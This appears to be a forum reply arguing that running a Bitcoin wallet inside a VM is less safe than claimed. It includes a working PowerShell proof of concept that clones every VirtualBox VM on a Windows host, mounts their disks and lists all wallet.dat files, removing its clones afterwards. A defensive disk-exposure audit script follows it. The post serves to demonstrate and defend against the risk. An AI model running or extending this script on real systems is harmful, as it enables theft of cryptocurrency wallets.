It is a lot safer than an online machine, but significantly less safe than a true offline machine. I use it myself for a small day-to-day wallet, and have a larger one on an offline machine. The VM is very convenient. Of course a determined hacker who is controlling the online machine can run with the funds. But the random wallet-stealing and password sniffing piece of malware cannot. It requires a specialised piece of malware written for the specific setup.
So this kinda rubbed me the wrong way. I mean nothing personal when I say this, but calling a VM "a lot safer" is IMO a really dangerous statement. Even if it's true that today's malware doesn't try to reach inside VMs to extract sensitive info (and I'm not so sure about that), trying to guess about how sophisticated malware is a year or two down the road is awfully difficult.
To prove a point over just how "specialised [a] piece of malware written for the specific setup" needs to be, here's a (PowerShell) script which *almost* grabs all wallet.dat files from any (unencrypted) VirtualBox VMs on a Windows host (whether they are currently running or not). It's got plenty of limitations (it requires that Vagrant and Git for Windows are already installed, it has zero error-checking, etc.), but it's just a proof of concept which hopefully gets the point across.
```powershell
# Add VBoxManage and Git for Windows ssh to the path
$env:Path += ';' + (Join-Path $env:ProgramFiles Oracle\VirtualBox)
$env:Path += ';' + (Join-Path ${env:ProgramFiles(x86)} Git\bin)
# Retrieve the UUIDs of all current VirtualBox VMs
$vm_uuids = VBoxManage list vms | Select-String '{(.*)}$' | ForEach-Object {
    $_.Matches[0].Groups[1].Value
}
# Configure Vagrant to prepare a CoreOS VM (relatively small, ~200MB)
mkdir coreos
cd coreos
vagrant init yungsang/coreos
# Modify the CoreOS VM to use a 30-port SATA controller
Add-Content Vagrantfile @"
Vagrant.configure(2) do |config|
  config.vm.provider 'virtualbox' do |vb|
    vb.customize ['storagectl', :id, '--name', 'SATA Controller', '--portcount', 30]
  end
end
"@
# Download and start the CoreOS VM
vagrant up
$coreos_uuid = Get-Content .vagrant\machines\default\virtualbox\id -Head 1
$next_port = 1 # the next available SATA port
foreach ($uuid in $vm_uuids) { # for each VM
    # Create a (copy-on-write) clone of the VM (works even if it's currently running)
    VBoxManage snapshot $uuid take $uuid-snap --live
    VBoxManage clonevm $uuid --snapshot $uuid-snap --options link --name $uuid-clone --register
    # Add all of the clone's SATA drives to the CoreOS instance
    VBoxManage showvminfo $uuid-clone | Select-String '^SATA .*\(UUID: ([^)]*)' | ForEach-Object {
        VBoxManage storageattach $coreos_uuid --storagectl 'SATA Controller' --port ($next_port++) --type hdd --medium $_.Matches[0].Groups[1].Value
    }
}
Start-Sleep -Seconds 10 # give CoreOS some time to finish recognizing the new drives
# Try to mount every partition found
vagrant ssh -c 'cd /dev ; for D in sd[b-z]?* ; do mkdir /media/$D ; sudo mount -r $D /media/$D ; done'
# Record all found wallet.dat files
vagrant ssh -c 'sudo find /media -name wallet.dat -ls' > ..\wallet-files.txt
# Remove the CoreOS VM and the Vagrant cached image and config
vagrant destroy -f
vagrant box remove yungsang/coreos -f # comment this out if you intend to run this multiple times to avoid the download step
rmdir -Force -Recurse .vagrant
rm Vagrantfile
cd ..
rmdir coreos
# Remove the VM clones
foreach ($uuid in $vm_uuids) {
    VBoxManage unregistervm $uuid-clone --delete
    VBoxManage snapshot $uuid delete $uuid-snap
}
Get-Content wallet-files.txt
Write-Host -NoNewline Press any key to exit ...
$host.UI.RawUI.ReadKey('NoEcho,IncludeKeyDown') > $null
```
So in just 66 lines of Windows shell code, it lists out all found wallet.dat files -- just one step away from actually uploading them somewhere. This plus a keylogger on the host, and it's game over.
Now I'm not even a software dev by trade (or at least haven't been one in a while), so I have to assume that proficient malware authors are going to be a lot more sophisticated about this sort of attack.
I don't mean to claim that there's zero advantage to using VMs (more so when their encryption requires an interactive password), but advocating them as a lot safer (or as any kind of alternative to cold storage) sounds really troubling to me.
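A host-side audit for the two conditions the proof of concept above depends on: disk images that are unencrypted, and snapshot or linked-clone images the operator did not create. This is an added example, not part of the original post. It assumes the `UUID`, `Parent UUID`, `Location` and `Encryption` fields printed by `VBoxManage list hdds` in recent VirtualBox versions; the function names, the `-KnownChildDisks` baseline parameter and the sample listing are constructed for illustration.

```powershell
# Constructed, abbreviated sample of `VBoxManage list hdds` output (not from a real host).
# On a real host use:  $raw = (VBoxManage list hdds) -join "`n"
$raw = @'
UUID:           11111111-1111-1111-1111-111111111111
Parent UUID:    base
Location:       C:\VMs\wallet\wallet.vdi
Encryption:     disabled

UUID:           22222222-2222-2222-2222-222222222222
Parent UUID:    11111111-1111-1111-1111-111111111111
Location:       C:\VMs\wallet\Snapshots\{22222222-2222-2222-2222-222222222222}.vdi
Encryption:     disabled

UUID:           33333333-3333-3333-3333-333333333333
Parent UUID:    base
Location:       C:\VMs\cold\cold.vdi
Encryption:     enabled
'@

# Split the listing into one object per disk (records are separated by blank lines).
function ConvertFrom-VBoxHddList {
    param([string]$Text)
    foreach ($block in ($Text -split '(?:\r?\n){2,}')) {
        $rec = [ordered]@{}
        foreach ($line in ($block -split '\r?\n')) {
            if ($line -match '^([^:]+):\s*(.*)$') { $rec[$Matches[1].Trim()] = $Matches[2].Trim() }
        }
        if ($rec.Contains('UUID')) { [pscustomobject]$rec }
    }
}

# Report disks that are unencrypted, or that are differencing images
# (snapshots / linked clones) missing from the operator's own baseline.
function Test-VBoxDiskExposure {
    param([string]$Text, [string[]]$KnownChildDisks = @())
    foreach ($d in (ConvertFrom-VBoxHddList $Text)) {
        $findings = @()
        # No Encryption line at all (older VirtualBox) is treated as unencrypted.
        if ($d.Encryption -ne 'enabled') { $findings += 'unencrypted' }
        if ($d.'Parent UUID' -ne 'base' -and $KnownChildDisks -notcontains $d.UUID) {
            $findings += 'snapshot/clone image not in baseline'
        }
        if ($findings) {
            [pscustomobject]@{ UUID = $d.UUID; Location = $d.Location; Findings = $findings -join '; ' }
        }
    }
}

Test-VBoxDiskExposure -Text $raw | Format-List
```

Pass the UUIDs of snapshots you took yourself in `-KnownChildDisks` so that only unexpected differencing images are reported.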